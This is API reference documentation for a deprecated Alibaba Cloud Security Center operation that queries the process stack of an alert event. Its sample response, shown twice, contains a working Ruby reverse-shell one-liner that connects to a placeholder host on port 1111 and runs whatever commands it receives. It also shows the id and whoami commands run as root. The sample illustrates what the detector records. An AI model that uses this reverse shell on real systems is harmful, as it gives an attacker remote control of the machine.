Queries the stack information of an alert event.
This API has been deprecated with no replacement. While temporary access is maintained, no further updates or bug fixes will be provided. To ensure continued functionality, plan your migration and contact your account manager for support.
Try it now
Test
RAM authorization
|
Action |
Access level |
Resource type |
Condition key |
Dependent action |
|
yundun-sas:DescribeAlarmEventStackInfo |
get |
*All Resource
|
None | None |
Request parameters
|
Parameter |
Type |
Required |
Description |
Example |
| SourceIp |
string |
No |
The source IP address of the request. |
192.168.XX.XX |
| Lang |
string |
No |
The language of the content in the request and response. Default value: zh. Valid values:
|
zh |
| Uuid |
string |
Yes |
The UUID of the server that you want to query. Note
You can call the DescribeSuspEvents operation to query the UUIDs of servers. |
18b7336e-d469-473b-af83-8e5420f9**** |
| EventName |
string |
Yes |
The name of the alert event. Note
You can call the DescribeSuspEvents operation to query the names of events. |
Variable Trojan |
| UniqueInfo |
string |
Yes |
The ID of the alert event. |
1fbe8d16727f61d1478a674d6fa0**** |
| ResourceDirectoryAccountId |
integer |
No |
The Alibaba Cloud account ID of the member in the resource directory. Note
You can call the DescribeMonitorAccounts operation to obtain the IDs. |
127608589417**** |
Response elements
|
Element |
Type |
Description |
Example |
|
object |
The response body. |
||
| StackInfo |
string |
The stack information of the alert event. |
[ { "child": [ { "child": [ { "child": [ ], "data": { "cmdline": "id", "proc_path": "/bin/id", "pid": "[3033]" }, "description": { "extend": [ ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } }, { "child": [ ], "data": { "cmdline": "whoami", "proc_path": "/bin/whoami", "pid": "[3035]" }, "description": { "extend": [ ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } } ], "data": { "cmdline": "/bin/bash -c 'id && whoami'", "proc_path": "/bin/bash", "pid": "[3022]" }, "description": { "extend": [ ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } } ], "data": { "src_ip": "0.0.0.0", "cmdline": "ruby -rsocket -e exit if fork;c=TCPSocket.new(\"0.0.0.0\",\"1111\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", "file": "ruby", "login_port": "22", "login_type": "password", "proc_path": "/usr/bin/ruby", "dst_port": "1111", "pid": "3011", "user": "root", "dst_ip": "0.0.0.0", "log_time": "2020-01-20 09:00:00" }, "description": { "extend": [ { "content": "${tpl_netstat}", "content_type": "text" } ], "main": { "content": "${pid} ${cmdline}", "content_type": "markdown" } } } ] |
| RequestId |
string |
The request ID. |
ECC6B3E3-D496-512D-B46D-E6996A6B63EE |
Examples
Success response
JSON format
{
"StackInfo": "[\n {\n \"child\": [\n {\n \"child\": [\n {\n \"child\": [\n \n ],\n \"data\": {\n \"cmdline\": \"id\",\n \"proc_path\": \"/bin/id\",\n \"pid\": \"[3033]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n },\n {\n \"child\": [\n \n ],\n \"data\": {\n \"cmdline\": \"whoami\",\n \"proc_path\": \"/bin/whoami\",\n \"pid\": \"[3035]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n ],\n \"data\": {\n \"cmdline\": \"/bin/bash -c 'id && whoami'\",\n \"proc_path\": \"/bin/bash\",\n \"pid\": \"[3022]\"\n },\n \"description\": {\n \"extend\": [\n \n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n ],\n \"data\": {\n \"src_ip\": \"0.0.0.0\",\n \"cmdline\": \"ruby -rsocket -e exit if fork;c=TCPSocket.new(\\\"0.0.0.0\\\",\\\"1111\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end\",\n \"file\": \"ruby\",\n \"login_port\": \"22\",\n \"login_type\": \"password\",\n \"proc_path\": \"/usr/bin/ruby\",\n \"dst_port\": \"1111\",\n \"pid\": \"3011\",\n \"user\": \"root\",\n \"dst_ip\": \"0.0.0.0\",\n \"log_time\": \"2020-01-20 09:00:00\"\n },\n \"description\": {\n \"extend\": [\n {\n \"content\": \"${tpl_netstat}\",\n \"content_type\": \"text\"\n }\n ],\n \"main\": {\n \"content\": \"${pid} ${cmdline}\",\n \"content_type\": \"markdown\"\n }\n }\n }\n]",
"RequestId": "ECC6B3E3-D496-512D-B46D-E6996A6B63EE"
}
Error codes
|
HTTP status code |
Error code |
Error message |
Description |
|---|---|---|---|
| 400 | NoPermission | no permission | |
| 400 | RdCheckNoPermission | Resource directory account verification has no permission. | |
| 500 | RdCheckInnerError | Resource directory account service internal error. | |
| 500 | ServerError | ServerError | |
| 403 | NoPermission | caller has no permission | You are not authorized to do this operation. |
See Error Codes for a complete list.
Release notes
See Release Notes for a complete list.